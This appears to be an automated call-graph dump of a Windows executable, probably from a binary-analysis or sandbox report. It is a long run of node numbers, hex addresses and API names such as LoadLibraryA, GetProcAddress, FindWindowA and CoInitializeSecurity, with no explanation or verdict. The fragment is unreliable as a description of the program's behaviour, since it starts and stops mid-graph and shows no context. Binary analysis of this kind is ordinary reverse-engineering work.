11025d0e GetProcAddress 61191->61192 61193 11025d1f 61191->61193 61192->61193 61194 11025d38 61193->61194 61195 11025d2c K32GetProcessImageFileNameA 61193->61195 61197 11025d3e GetProcAddress 61194->61197 61198 11025d4f 61194->61198 61195->61194 61196 11025d71 61195->61196 61196->61155 61197->61198 61199 11025d56 61198->61199 61200 11025d67 SetLastError 61198->61200 61199->61155 61200->61196 61201->61124 61202->61155 61206->61187 61207 110173f0 GetTickCount 61214 11017300 61207->61214 61212 11146450 std::locale::facet::_Facet_Register 21 API calls 61213 11017437 61212->61213 61215 11017320 61214->61215 61216 110173d6 61214->61216 61217 11017342 CoInitialize _GetRawWMIStringW 61215->61217 61219 11017339 WaitForSingleObject 61215->61219 61218 11161d01 _strupr_s_l_stat 5 API calls 61216->61218 61220 11017375 61217->61220 61223 110173c2 61217->61223 61221 110173e5 61218->61221 61219->61217 61220->61223 61224 110173bc 61220->61224 61226 11163a2d std::locale::facet::_Facet_Register 191 API calls 61220->61226 61227 11017220 61221->61227 61222 110173d0 CoUninitialize 61222->61216 61223->61216 61223->61222 61240 11163837 __fassign 61224->61240 61226->61220 61228 11017240 61227->61228 61229 110172e6 61227->61229 61230 11017258 CoInitialize _GetRawWMIStringW 61228->61230 61232 1101724f WaitForSingleObject 61228->61232 61231 11161d01 _strupr_s_l_stat 5 API calls 61229->61231 61233 110172d2 61230->61233 61236 1101728b 61230->61236 61234 110172f5 SetEvent GetTickCount 61231->61234 61232->61230 61233->61229 61235 110172e0 CoUninitialize 61233->61235 61234->61212 61235->61229 61236->61233 61237 110172cc 61236->61237 61239 11163a2d std::locale::facet::_Facet_Register 191 API calls 61236->61239 61241 11163837 __fassign 61237->61241 61239->61236 61240->61223 61241->61233 61242 11025cd0 LoadLibraryA 61243 1113cd60 61244 1113cd69 61243->61244 61245 1113cd6e 61243->61245 61247 11139090 61244->61247 61248 111390d2 61247->61248 61249 111390c7 GetCurrentThreadId 61247->61249 61250 111390e0 61248->61250 61374 11029330 61248->61374 61249->61248 61381 11133920 61250->61381 61256 111391d1 61259 11139202 FindWindowA 61256->61259 61265 1113929a 61256->61265 61257 11161d01 _strupr_s_l_stat 5 API calls 61260 11139772 61257->61260 61262 11139217 IsWindowVisible 61259->61262 61259->61265 61260->61245 61261 1113911c IsWindow IsWindowVisible 61263 11146450 std::locale::facet::_Facet_Register 21 API calls 61261->61263 61262->61265 61267 1113921e 61262->61267 61264 11139147 61263->61264 61266 1105dd10 191 API calls 61264->61266 61268 1105dd10 191 API calls 61265->61268 61269 111392bf 61265->61269 61270 11139163 IsWindowVisible 61266->61270 61267->61265 61272 11138c30 474 API calls 61267->61272 61286 111392e7 61268->61286 61273 1105dd10 191 API calls 61269->61273 61278 1113945f 61269->61278 61270->61256 61274 11139171 61270->61274 61271 1113948a 61277 111394a7 61271->61277 61610 1106b860 411 API calls 61271->61610 61276 1113923f IsWindowVisible 61272->61276 61273->61278 61274->61256 61279 11139179 61274->61279 61275 11138c30 474 API calls 61275->61271 61276->61265 61280 1113924e IsIconic 61276->61280 61288 111394b4 61277->61288 61289 111394bd 61277->61289 61278->61271 61278->61275 61282 11146450 std::locale::facet::_Facet_Register 21 API calls 61279->61282 61280->61265 61283 1113925f GetForegroundWindow 61280->61283 61284 11139183 GetForegroundWindow 61282->61284 61608 11131210 264 API calls 61283->61608 61293 11139192 EnableWindow 61284->61293 61294 111391be 61284->61294 61286->61269 61287 11139334 61286->61287 61296 11081a70 IsDBCSLeadByte 61286->61296 61290 11143230 std::locale::facet::_Facet_Register 8 API calls 61287->61290 61611 11131b00 202 API calls 2 library calls 61288->61611 61291 111394d4 61289->61291 61292 111394c8 61289->61292 61299 11139346 61290->61299 61613 111317a0 413 API calls std::locale::facet::_Facet_Register 61291->61613 61300 111394d9 61292->61300 61301 111394cd 61292->61301 61606 11131210 264 API calls 61293->61606 61294->61256 61309 111391ca SetForegroundWindow 61294->61309 61295 1113926e 61609 11131210 264 API calls 61295->61609 61296->61287 61298 111394ba 61298->61289 61305 11139353 GetLastError 61299->61305 61324 11139361 61299->61324 61307 11139599 61300->61307 61313 111394f1 61300->61313 61314 1113959b 61300->61314 61612 11131870 413 API calls std::locale::facet::_Facet_Register 61301->61612 61311 11146450 std::locale::facet::_Facet_Register 21 API calls 61305->61311 61316 111386b0 438 API calls 61307->61316 61308 111391a9 61607 11131210 264 API calls 61308->61607 61309->61256 61310 11139275 61317 1113928b EnableWindow 61310->61317 61318 11139284 SetForegroundWindow 61310->61318 61311->61324 61312 111394d2 61312->61300 61313->61307 61326 1110f420 std::locale::facet::_Facet_Register 395 API calls 61313->61326 61314->61307 61619 1103f000 70 API calls 61314->61619 61332 111395ee 61316->61332 61317->61265 61318->61317 61319 111391b0 EnableWindow 61319->61294 61320 11139615 61323 1113974a 61320->61323 61334 1105dd10 191 API calls 61320->61334 61322 111395aa 61620 1103f040 70 API calls 61322->61620 61323->61257 61324->61269 61325 111393b2 61324->61325 61329 11081a70 IsDBCSLeadByte 61324->61329 61327 11143230 std::locale::facet::_Facet_Register 8 API calls 61325->61327 61330 11139512 61326->61330 61331 111393c4 61327->61331 61329->61325 61335 11139544 61330->61335 61336 11139524 61330->61336 61331->61269 61338 111393cb GetLastError 61331->61338 61332->61320 61524 11142210 61332->61524 61333 111395b5 61621 1103f060 70 API calls 61333->61621 61341 11139645 61334->61341 61615 1110f260 InterlockedIncrement 61335->61615 61614 110573b0 411 API calls std::locale::facet::_Facet_Register 61336->61614 61343 11146450 std::locale::facet::_Facet_Register 21 API calls 61338->61343 61341->61323 61350 11139662 61341->61350 61351 1113968d 61341->61351 61342 11139533 61342->61335 61343->61269 61345 111395c0 61622 1103f020 70 API calls 61345->61622 61346 11139558 61616 1104e340 403 API calls 61346->61616 61348 111395cb 61623 1110f270 InterlockedDecrement 61348->61623 61352 11139699 GetTickCount 61350->61352 61354 1113966a 61350->61354 61351->61323 61351->61352 61352->61323 61355 111396ab 61352->61355 61357 11146450 std::locale::facet::_Facet_Register 21 API calls 61354->61357 61359 11142e80 262 API calls 61355->61359 61356 1113956e 61617 1104e3b0 403 API calls 61356->61617 61358 11139675 GetTickCount 61357->61358 61358->61323 61361 111396b7 61359->61361 61362 11146ee0 397 API calls 61361->61362 61363 111396c2 61362->61363 61364 11142e80 262 API calls 61363->61364 61366 111396d5 61364->61366 61365 11139579 61365->61307 61618 110ebf30 419 API calls 61365->61618 61624 11025bb0 LoadLibraryA 61366->61624 61369 111396e2 61369->61369 61625 1112c7a0 GetProcAddress SetLastError 61369->61625 61371 11139729 61372 11139733 FreeLibrary 61371->61372 61373 1113973a std::ios_base::_Tidy 61371->61373 61372->61373 61373->61323 61626 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 61374->61626 61376 1102933e 61377 11029353 61376->61377 61627 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 61376->61627 61628 11089cc0 399 API calls 2 library calls 61377->61628 61380 1102935e 61380->61250 61382 11133962 61381->61382 61383 11133c84 61381->61383 61385 1105dd10 191 API calls 61382->61385 61384 11161d01 _strupr_s_l_stat 5 API calls 61383->61384 61386 11133c9c 61384->61386 61387 11133982 61385->61387 61429 11133400 61386->61429 61387->61383 61388 1113398a GetLocalTime 61387->61388 61389 111339c1 LoadLibraryA 61388->61389 61390 111339a0 61388->61390 61629 110098c0 LoadLibraryA 61389->61629 61391 11146450 std::locale::facet::_Facet_Register 21 API calls 61390->61391 61394 111339b5 61391->61394 61393 11133a15 61630 11015c30 LoadLibraryA 61393->61630 61394->61389 61396 11133a20 GetCurrentProcess 61397 11133a45 GetProcAddress 61396->61397 61398 11133a5d GetProcessHandleCount 61396->61398 61397->61398 61399 11133a66 SetLastError 61397->61399 61400 11133a6e 61398->61400 61399->61400 61401 11133a78 GetProcAddress 61400->61401 61404 11133a92 61400->61404 61402 11133ac7 SetLastError 61401->61402 61401->61404 61403 11133aa0 GetProcAddress 61402->61403 61405 11133aba 61403->61405 61406 11133ad4 SetLastError 61403->61406 61404->61403 61404->61405 61407 11133adf GetProcAddress 61405->61407 61406->61407 61408 11133af1 K32GetProcessMemoryInfo 61407->61408 61409 11133aff SetLastError 61407->61409 61410 11133b07 61408->61410 61409->61410 61411 11146450 std::locale::facet::_Facet_Register 21 API calls 61410->61411 61413 11133b7d 61410->61413 61411->61413 61412 11133c5a 61414 11133c6a FreeLibrary 61412->61414 61415 11133c6d 61412->61415 61413->61412 61419 1105dd10 191 API calls 61413->61419 61414->61415 61416 11133c77 FreeLibrary 61415->61416 61417 11133c7a 61415->61417 61416->61417 61417->61383 61418 11133c81 FreeLibrary 61417->61418 61418->61383 61420 11133bce 61419->61420 61421 1105dd10 191 API calls 61420->61421 61422 11133bf6 61421->61422 61423 1105dd10 191 API calls 61422->61423 61424 11133c1d 61423->61424 61425 1105dd10 191 API calls 61424->61425 61426 11133c44 61425->61426 61426->61412 61427 11133c55 61426->61427 61631 11027780 395 API calls 2 library calls 61427->61631 61431 1113342d 61429->61431 61430 111338e9 61430->61256 61430->61323 61528 11138c30 61430->61528 61431->61430 61432 110d1550 395 API calls 61431->61432 61433 1113348e 61432->61433 61434 110d1550 395 API calls 61433->61434 61435 11133499 61434->61435 61436 111334c7 61435->61436 61437 111334de 61435->61437 61632 11029450 395 API calls 2 library calls 61436->61632 61439 11146450 std::locale::facet::_Facet_Register 21 API calls 61437->61439 61441 111334ec 61439->61441 61442 11133505 61441->61442 61443 1113351c 61441->61443 61633 11029450 395 API calls 2 library calls 61442->61633 61445 11081bb0 200 API calls 61443->61445 61447 1113352a 61445->61447 61448 11133541 61447->61448 61634 11009450 395 API calls std::locale::facet::_Facet_Register 61447->61634 61449 11146450 std::locale::facet::_Facet_Register 21 API calls 61448->61449 61454 111335e5 61448->61454 61451 11133556 61449->61451 61451->61454 61455 11146450 std::locale::facet::_Facet_Register 21 API calls 61451->61455 61452 1113353b 61453 11081a70 IsDBCSLeadByte 61452->61453 61453->61448 61456 11146450 std::locale::facet::_Facet_Register 21 API calls 61454->61456 61471 1113368e 61454->61471 61457 11133580 61455->61457 61465 111335f7 61456->61465 61635 110ed7a0 RegCloseKey 61457->61635 61459 110ed1a0 2 API calls 61459->61465 61460 11133598 61636 110ed430 399 API calls 2 library calls 61460->61636 61462 111335a9 61637 1102a0b0 395 API calls std::locale::facet::_Facet_Register 61462->61637 61465->61459 61467 1113365b 61465->61467 61465->61471 61639 110ed430 399 API calls 2 library calls 61465->61639 61466 111335b3 61468 11146450 std::locale::facet::_Facet_Register 21 API calls 61466->61468 61469 111335ca 61466->61469 61467->61465 61640 11029450 395 API calls 2 library calls 61467->61640 61468->61469 61469->61454 61638 1102a0b0 395 API calls std::locale::facet::_Facet_Register 61469->61638 61472 111336c1 61471->61472 61473 111336aa 61471->61473 61476 111336be 61472->61476 61479 111336ec 61472->61479 61484 11133734 61472->61484 61641 11029450 395 API calls 2 library calls 61473->61641 61476->61472 61642 11029450 395 API calls 2 library calls 61476->61642 61477 111337cc 61480 11133816 61477->61480 61481 111337ff 61477->61481 61478 11133780 _free 61482 11133798 61478->61482 61485 11081b40 std::locale::facet::_Facet_Register IsDBCSLeadByte 61479->61485 61495 11133813 61480->61495 61505 11133845 61480->61505 61515 111338a1 61480->61515 61647 11029450 395 API calls 2 library calls 61481->61647 61488 111337b3 61482->61488 61489 1113379c 61482->61489 61484->61477 61484->61478 61491 11133752 61484->61491 61492 11133769 61484->61492 61486 111336f7 61485->61486 61486->61484 61508 11133725 61486->61508 61509 1113370e 61486->61509 61497 11163cf8 __strdup 67 API calls 61488->61497 61646 11029450 395 API calls 2 library calls 61489->61646 61645 11029450 395 API calls 2 library calls 61491->61645 61493 11081bb0 200 API calls 61492->61493 61500 11133779 61493->61500 61494 110d07c0 396 API calls 61501 111338da 61494->61501 61495->61480 61648 11029450 395 API calls 2 library calls 61495->61648 61503 111337bc 61497->61503 61500->61477 61500->61478 61504 110d07c0 396 API calls 61501->61504 61506 11146450 std::locale::facet::_Facet_Register 21 API calls 61503->61506 61504->61430 61507 11081bb0 200 API calls 61505->61507 61506->61477 61511 11133853 61507->61511 61644 110d0800 395 API calls 2 library calls 61508->61644 61643 11029450 395 API calls 2 library calls 61509->61643 61511->61515 61517 11133868 61511->61517 61518 1113387f 61511->61518 61515->61494 61649 11029450 395 API calls 2 library calls 61517->61649 61520 11081a70 IsDBCSLeadByte 61518->61520 61522 1113388a 61520->61522 61522->61515 61650 11009450 395 API calls std::locale::facet::_Facet_Register 61522->61650 61525 1114221a 61524->61525 61527 1114222f 61524->61527 61651 11141890 61525->61651 61527->61320 61531 11138c4d 61528->61531 61582 1113906f 61528->61582 61529 11161d01 _strupr_s_l_stat 5 API calls 61530 1113907e 61529->61530 61530->61261 61532 111450a0 std::locale::facet::_Facet_Register 206 API calls 61531->61532 61531->61582 61533 11138c8c 61532->61533 61534 1105dd10 191 API calls 61533->61534 61533->61582 61535 11138cbb 61534->61535 61774 1112c920 61535->61774 61537 11138e00 PostMessageA 61539 11138e15 61537->61539 61538 1105dd10 191 API calls 61541 11138dfc 61538->61541 61540 11138e25 61539->61540 61783 1110f270 InterlockedDecrement 61539->61783 61543 11138e2b 61540->61543 61544 11138e4d 61540->61544 61541->61537 61541->61539 61546 11138e83 std::ios_base::_Tidy 61543->61546 61547 11138e9e 61543->61547 61784 11130410 417 API calls std::locale::facet::_Facet_Register 61544->61784 61552 11161d01 _strupr_s_l_stat 5 API calls 61546->61552 61549 11142e80 262 API calls 61547->61549 61548 11138e55 61785 1112cb20 SetDlgItemTextA 61548->61785 61551 11138ea3 61549->61551 61553 11146ee0 397 API calls 61551->61553 61555 11138e9a 61552->61555 61556 11138eaa SetWindowTextA 61553->61556 61555->61261 61558 11138ec6 61556->61558 61564 11138ecd std::ios_base::_Tidy 61556->61564 61557 11138e70 std::ios_base::_Tidy 61557->61543 61786 111352b0 426 API calls 5 library calls 61558->61786 61559 11145b40 4 API calls 61561 11138dab 61559->61561 61561->61537 61561->61538 61562 11138f24 61565 11138f38 61562->61565 61566 11138ffc 61562->61566 61563 11138ef7 61563->61562 61569 11138f0c 61563->61569 61564->61562 61564->61563 61787 111352b0 426 API calls 5 library calls 61564->61787 61570 11138f5c 61565->61570 61789 111352b0 426 API calls 5 library calls 61565->61789 61568 1113901d 61566->61568 61572 1113900b 61566->61572 61573 11139004 61566->61573 61795 110f8640 201 API calls 61568->61795 61788 11131210 264 API calls 61569->61788 61791 110f8640 201 API calls 61570->61791 61794 11131210 264 API calls 61572->61794 61793 111352b0 426 API calls 5 library calls 61573->61793 61576 11139028 61576->61582 61583 1113902c IsWindowVisible 61576->61583 61578 11138f67 61578->61582 61585 11138f6f IsWindowVisible 61578->61585 61580 11138f1c 61580->61562 61582->61529 61583->61582 61587 1113903e IsWindowVisible 61583->61587 61584 11138f46 61584->61570 61588 11138f52 61584->61588 61585->61582 61589 11138f86 61585->61589 61586 1113901a 61586->61568 61587->61582 61590 1113904b EnableWindow 61587->61590 61790 11131210 264 API calls 61588->61790 61592 111450a0 std::locale::facet::_Facet_Register 206 API calls 61589->61592 61796 11131210 264 API calls 61590->61796 61595 11138f91 61592->61595 61594 11138f59 61594->61570 61595->61582 61597 11138f9c GetForegroundWindow IsWindowVisible 61595->61597 61596 11139062 EnableWindow 61596->61582 61598 11138fc1 61597->61598 61599 11138fb6 EnableWindow 61597->61599 61792 11131210 264 API calls 61598->61792 61599->61598 61601 11138fc8 61602 11138fde EnableWindow 61601->61602 61603 11138fd7 SetForegroundWindow 61601->61603 61604 11161d01 _strupr_s_l_stat 5 API calls 61602->61604 61603->61602 61605 11138ff8 61604->61605 61605->61261 61606->61308 61607->61319 61608->61295 61609->61310 61610->61277 61611->61298 61612->61312 61613->61300 61614->61342 61615->61346 61616->61356 61617->61365 61618->61307 61619->61322 61620->61333 61621->61345 61622->61348 61623->61307 61624->61369 61625->61371 61626->61376 61627->61376 61628->61380 61629->61393 61630->61396 61631->61412 61634->61452 61635->61460 61636->61462 61637->61466 61638->61454 61639->61465 61644->61484 61650->61515 61652 111418cf 61651->61652 61690 111418c8 std::ios_base::_Tidy 61651->61690 61653 1110f420 std::locale::facet::_Facet_Register 395 API calls 61652->61653 61656 111418d6 61653->61656 61654 11161d01 _strupr_s_l_stat 5 API calls 61655 1114220a 61654->61655 61655->61527 61657 11061700 209 API calls 61656->61657 61658 11141942 61657->61658 61659 11141949 RegCloseKey 61658->61659 61660 11141950 61658->61660 61659->61660 61661 11143230 std::locale::facet::_Facet_Register 8 API calls 61660->61661 61662 11141980 61661->61662 61663 11141997 61662->61663 61664 11062d60 440 API calls 61662->61664 61665 1110f420 std::locale::facet::_Facet_Register 395 API calls 61663->61665 61664->61663 61666 1114199e 61665->61666 61667 1110f420 std::locale::facet::_Facet_Register 395 API calls 61666->61667 61668 111419d3 61667->61668 61669 1110f420 std::locale::facet::_Facet_Register 395 API calls 61668->61669 61670 11141a08 61669->61670 61671 11060760 399 API calls 61670->61671 61672 11141a4d 61671->61672 61673 11060760 399 API calls 61672->61673 61682 11141a67 61673->61682 61674 11141d95 61676 110d1550 395 API calls 61674->61676 61677 11142179 61674->61677 61675 110607f0 408 API calls 61675->61682 61678 11141db3 61676->61678 61772 11060640 73 API calls std::ios_base::_Tidy 61677->61772 61683 1105dd10 191 API calls 61678->61683 61679 11141d85 61680 11146450 std::locale::facet::_Facet_Register 21 API calls 61679->61680 61680->61674 61681 11146450 21 API calls std::locale::facet::_Facet_Register 61681->61682 61682->61674 61682->61675 61682->61679 61682->61681 61694 111319f0 200 API calls 61682->61694 61706 11081bb0 200 API calls 61682->61706 61714 11081c60 201 API calls std::locale::facet::_Facet_Register 61682->61714 61684 11141df0 61683->61684 61687 11060760 399 API calls 61684->61687 61692 11141f3d 61684->61692 61686 111421d2 61773 11060640 73 API calls std::ios_base::_Tidy 61686->61773 61689 11141e0e 61687->61689 61691 110607f0 408 API calls 61689->61691 61690->61654 61693 11141e1d 61691->61693 61765 110679c0 411 API calls std::locale::facet::_Facet_Register 61692->61765 61695 11141e52 61693->61695 61697 11146450 std::locale::facet::_Facet_Register 21 API calls 61693->61697 61703 110607f0 408 API calls 61693->61703 61694->61682 61698 11060760 399 API calls 61695->61698 61697->61693 61700 11141e68 61698->61700 61699 11141f83 61701 11141fb3 EnterCriticalSection 61699->61701 61708 11141f87 61699->61708 61704 110607f0 408 API calls 61700->61704 61702 11060420 402 API calls 61701->61702 61713 11141fd0 61702->61713 61703->61693 61715 11141e78 61704->61715 61706->61682 61707 11141eb1 61709 11060760 399 API calls 61707->61709 61708->61701 61766 110508e0 481 API calls 4 library calls 61708->61766 61767 110679c0 411 API calls std::locale::facet::_Facet_Register 61708->61767 61711 11141ec7 61709->61711 61710 11146450 std::locale::facet::_Facet_Register 21 API calls 61710->61715 61717 110607f0 408 API calls 61711->61717 61712 11141ffa LeaveCriticalSection 61719 1114204e 61712->61719 61720 1114200e 61712->61720 61713->61712 61718 1102a9f0 415 API calls 61713->61718 61714->61682 61715->61707 61715->61710 61721 110607f0 408 API calls 61715->61721 61736 11141ed6 61717->61736 61722 11141ff7 61718->61722 61723 11133400 403 API calls 61719->61723 61720->61719 61724 11146450 std::locale::facet::_Facet_Register 21 API calls 61720->61724 61721->61715 61722->61712 61726 11142058 61723->61726 61728 1114201c 61724->61728 61725 11141f11 61762 11060640 73 API calls std::ios_base::_Tidy 61725->61762 61729 110d1550 395 API calls 61726->61729 61731 1113cc30 430 API calls 61728->61731 61733 11142066 61729->61733 61730 11141f1f 61763 11060640 73 API calls std::ios_base::_Tidy 61730->61763 61735 11142021 61731->61735 61732 11146450 std::locale::facet::_Facet_Register 21 API calls 61732->61736 61768 110cff20 395 API calls std::locale::facet::_Facet_Register 61733->61768 61738 111414a0 1078 API calls 61735->61738 61736->61725 61736->61732 61739 110607f0 408 API calls 61736->61739 61737 11141f2e 61764 11060640 73 API calls std::ios_base::_Tidy 61737->61764 61742 11142027 61738->61742 61739->61736 61742->61719 61743 11146450 std::locale::facet::_Facet_Register 21 API calls 61742->61743 61744 11142040 61743->61744 61747 11026ba0 460 API calls 61744->61747 61745 110d07c0 396 API calls 61748 1114215b 61745->61748 61746 1114209c 61750 111420c3 61746->61750 61751 111420da 61746->61751 61756 1114211f 61746->61756 61747->61719 61749 110d07c0 396 API calls 61748->61749 61749->61677 61769 11029450 395 API calls 2 library calls 61750->61769 61753 11081bb0 200 API calls 61751->61753 61755 111420eb 61753->61755 61755->61756 61770 11009450 395 API calls std::locale::facet::_Facet_Register 61755->61770 61756->61745 61758 111420ff 61759 11081a70 IsDBCSLeadByte 61758->61759 61760 11142105 61759->61760 61760->61756 61771 11009450 395 API calls std::locale::facet::_Facet_Register 61760->61771 61762->61730 61763->61737 61764->61692 61765->61699 61766->61708 61767->61708 61768->61746 61770->61758 61771->61756 61772->61686 61773->61690 61775 1112c93c 61774->61775 61776 1112c977 61775->61776 61777 1112c964 61775->61777 61797 1106b860 411 API calls 61776->61797 61779 11146ee0 397 API calls 61777->61779 61780 1112c96f 61779->61780 61781 1112c9c3 61780->61781 61782 11142290 std::locale::facet::_Facet_Register 395 API calls 61780->61782 61781->61559 61781->61561 61782->61781 61783->61540 61784->61548 61785->61557 61786->61564 61787->61563 61788->61580 61789->61584 61790->61594 61791->61578 61792->61601 61793->61572 61794->61586 61795->61576 61796->61596 61797->61780 61798 11144200 61799 11144211 61798->61799 61812 11143c20 61799->61812 61803 11144295 61805 111442b2 61803->61805 61807 11144294 61803->61807 61804 1114425b 61806 11144262 ResetEvent 61804->61806 61820 11143de0 395 API calls 2 library calls 61806->61820 61807->61803 61821 11143de0 395 API calls 2 library calls 61807->61821 61810 11144276 SetEvent WaitForMultipleObjects 61810->61806 61810->61807 61811 111442af 61811->61805 61813 11143c2c GetCurrentProcess 61812->61813 61814 11143c4f 61812->61814 61813->61814 61815 11143c3d GetModuleFileNameA 61813->61815 61816 1110f420 std::locale::facet::_Facet_Register 393 API calls 61814->61816 61818 11143c79 WaitForMultipleObjects 61814->61818 61815->61814 61817 11143c6b 61816->61817 61817->61818 61822 11143570 GetModuleFileNameA 61817->61822 61818->61803 61818->61804 61820->61810 61821->61811 61823 111435f3 61822->61823 61824 111435b3 61822->61824 61827 111435ff LoadLibraryA 61823->61827 61828 11143619 GetModuleHandleA GetProcAddress 61823->61828 61825 11081b40 std::locale::facet::_Facet_Register IsDBCSLeadByte 61824->61825 61826 111435c1 61825->61826 61826->61823 61829 111435c8 LoadLibraryA 61826->61829 61827->61828 61830 1114360e LoadLibraryA 61827->61830 61831 11143647 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 61828->61831 61832 11143639 61828->61832 61829->61823 61830->61828 61833 11143673 10 API calls 61831->61833 61832->61833 61834 11161d01 _strupr_s_l_stat 5 API calls 61833->61834 61835 111436f0 61834->61835 61835->61818 61836 1115bde0 61837 1115bdf4 61836->61837 61838 1115bdec 61836->61838 61847 111631ab 61837->61847 61840 1115be14 61842 1115bf40 61844 1115bf62 _free 61842->61844 61845 1115be31 61845->61842 61846 1115bf24 SetLastError 61845->61846 61846->61845 61848 11170166 _calloc 67 API calls 61847->61848 61849 111631c5 61848->61849 61853 1115be08 61849->61853 61871 111692ef 67 API calls __getptd_noexit 61849->61871 61851 111631d8 61851->61853 61872 111692ef 67 API calls __getptd_noexit 61851->61872 61853->61840 61853->61842 61854 1115ba20 CoInitializeSecurity CoCreateInstance 61853->61854 61855 1115ba95 wsprintfW SysAllocString 61854->61855 61856 1115bc14 61854->61856 61861 1115badb 61855->61861 61857 11161d01 _strupr_s_l_stat 5 API calls 61856->61857 61859 1115bc40 61857->61859 61858 1115bc01 SysFreeString 61858->61856 61859->61845 61860 1115bbe9 61860->61858 61861->61858 61861->61860 61861->61861 61862 1115bb6c 61861->61862 61863 1115bb5a wsprintfW 61861->61863 61873 110974a0 61862->61873 61863->61862 61865 1115bb7e 61866 110974a0 396 API calls 61865->61866 61867 1115bb93 61866->61867 61878 11097550 InterlockedDecrement SysFreeString std::ios_base::_Tidy 61867->61878 61869 1115bbd7 61879 11097550 InterlockedDecrement SysFreeString std::ios_base::_Tidy 61869->61879 61871->61851 61872->61853 61874 1110f420 std::locale::facet::_Facet_Register 395 API calls 61873->61874 61875 110974d3 61874->61875 61876 110974e6 SysAllocString 61875->61876 61877 11097504 61875->61877 61876->61877 61877->61865 61878->61869 61879->61860 61880 1116970d 61881 1116971d 61880->61881 61882 11169718 61880->61882 61886 11169617 61881->61886 61898 11177075 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 61882->61898 61885 1116972b 61887 11169623 _fgets 61886->61887 61888 11169670 61887->61888 61895 111696c0 _fgets 61887->61895 61899 111694b3 61887->61899 61888->61895 61945 11025e20 7 API calls ___DllMainCRTStartup 61888->61945 61891 11169683 61892 111696a0 61891->61892 61946 11025e20 7 API calls ___DllMainCRTStartup 61891->61946 61893 111694b3 __CRT_INIT@12 242 API calls 61892->61893 61892->61895 61893->61895 61895->61885 61896 11169697 61897 111694b3 __CRT_INIT@12 242 API calls 61896->61897 61897->61892 61898->61881 61900 111694bf _fgets 61899->61900 61901 111694c7 61900->61901 61902 11169541 61900->61902 61947 1116d4d0 HeapCreate 61901->61947 61903 11169547 61902->61903 61904 111695a2 61902->61904 61914 11169565 61903->61914 61927 111694d0 _fgets 61903->61927 61993 1116d79b 67 API calls _doexit 61903->61993 61906 111695a7 61904->61906 61907 11169600 61904->61907 61909 1116b5fa ___set_flsgetvalue 3 API calls 61906->61909 61907->61927 61999 1116b8fe 202 API calls __freefls@4 61907->61999 61908 111694cc 61908->61927 61948 1116b96c GetModuleHandleW 61908->61948 61912 111695ac 61909->61912 61918 11169dbe __calloc_crt 67 API calls 61912->61918 61915 11169579 61914->61915 61994 1117140e DeleteCriticalSection _free 61914->61994 61997 1116958c 5 API calls __mtterm 61915->61997 61916 111694dc __RTC_Initialize 61921 111694e0 61916->61921 61928 111694ec GetCommandLineA ___crtGetEnvironmentStringsA 61916->61928 61922 111695b8 61918->61922 61920 1116956f 61995 1116b64b DecodePointer TlsFree DeleteCriticalSection _free DeleteCriticalSection 61920->61995 61990 1116d4ee HeapDestroy 61921->61990 61925 111695c4 DecodePointer 61922->61925 61922->61927 61931 111695d9 61925->61931 61926 11169574 61996 1116d4ee HeapDestroy 61926->61996 61927->61888 61973 111711c9 GetStartupInfoW 61928->61973 61932 111695f4 _free 61931->61932 61933 111695dd 61931->61933 61932->61927 61998 1116b688 67 API calls 4 library calls 61933->61998 61936 11169511 __setargv 61938 1116952a 61936->61938 61939 1116951a __setenvp 61936->61939 61937 1116950a 61991 1116b64b DecodePointer TlsFree DeleteCriticalSection _free DeleteCriticalSection 61937->61991 61938->61927 61992 1117140e DeleteCriticalSection _free 61938->61992 61939->61938 61942 11169523 61939->61942 61940 111695e4 GetCurrentThreadId 61940->61927 61986 1116d5ae 61942->61986 61945->61891 61946->61896 61947->61908 61949 1116b980 61948->61949 61950 1116b989 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 61948->61950 62000 1116b64b DecodePointer TlsFree DeleteCriticalSection _free DeleteCriticalSection 61949->62000 61953 1116b9d3 TlsAlloc 61950->61953 61952 1116b985 61952->61916 61955 1116bae2 61953->61955 61956 1116ba21 TlsSetValue 61953->61956 61955->61916 61956->61955 61957 1116ba32 61956->61957 62001 1116d557 EncodePointer EncodePointer __init_pointers _doexit __initp_misc_winsig 61957->62001 61959 1116ba37 EncodePointer EncodePointer EncodePointer EncodePointer 62002 111735c2 InitializeCriticalSectionAndSpinCount 61959->62002 61961 1116ba76 61962 1116badd 61961->61962 61963 1116ba7a DecodePointer 61961->61963 62004 1116b64b DecodePointer TlsFree DeleteCriticalSection _free DeleteCriticalSection 61962->62004 61965 1116ba8f 61963->61965 61965->61962 61966 11169dbe __calloc_crt 67 API calls 61965->61966 61967 1116baa5 61966->61967 61967->61962 61968 1116baad DecodePointer 61967->61968 61969 1116babe 61968->61969 61969->61962 61970 1116bac2 61969->61970 62003 1116b688 67 API calls 4 library calls 61970->62003 61972 1116baca GetCurrentThreadId 61972->61955 61974 11169dbe __calloc_crt 67 API calls 61973->61974 61983 111711e7 61974->61983 61975 1117135c 61976 11171392 GetStdHandle 61975->61976 61978 111713f6 SetHandleCount 61975->61978 61979 111713a4 GetFileType 61975->61979 61984 111713ca InitializeCriticalSectionAndSpinCount 61975->61984 61976->61975 61977 11169dbe __calloc_crt 67 API calls 61977->61983 61985 11169506 61978->61985 61979->61975 61980 111712dc 61980->61975 61981 11171313 InitializeCriticalSectionAndSpinCount 61980->61981 61982 11171308 GetFileType 61980->61982 61981->61980 61981->61985 61982->61980 61982->61981 61983->61975 61983->61977 61983->61980 61983->61985 61984->61975 61984->61985 61985->61936 61985->61937 61988 1116d5bc __IsNonwritableInCurrentImage 61986->61988 62005 1116c9cb EncodePointer 61988->62005 61989 1116d5da __initterm_e __IsNonwritableInCurrentImage 61989->61938 61990->61927 61991->61921 61992->61937 61993->61914 61994->61920 61995->61926 61996->61915 61997->61927 61998->61940 61999->61927 62000->61952 62001->61959 62002->61961 62003->61972 62004->61955 62005->61989 62006 110304b8 62007 110304c6 62006->62007 62008 11142bb0 197 API calls 62007->62008 62009 11030503 62008->62009 62010 11030518 62009->62010 62011 11081bb0 200 API calls 62009->62011 62012 110ed1a0 2 API calls 62010->62012 62011->62010 62013 1103053f 62012->62013 62014 11030589 62013->62014 62075 110ed250 6 API calls _strupr_s_l_stat 62013->62075 62018 11142bb0 197 API calls 62014->62018 62016 11030554 62076 110ed250 6 API calls _strupr_s_l_stat 62016->62076 62020 110305a0 62018->62020 62019 1103056b 62019->62014 62021 111463d0 19 API calls 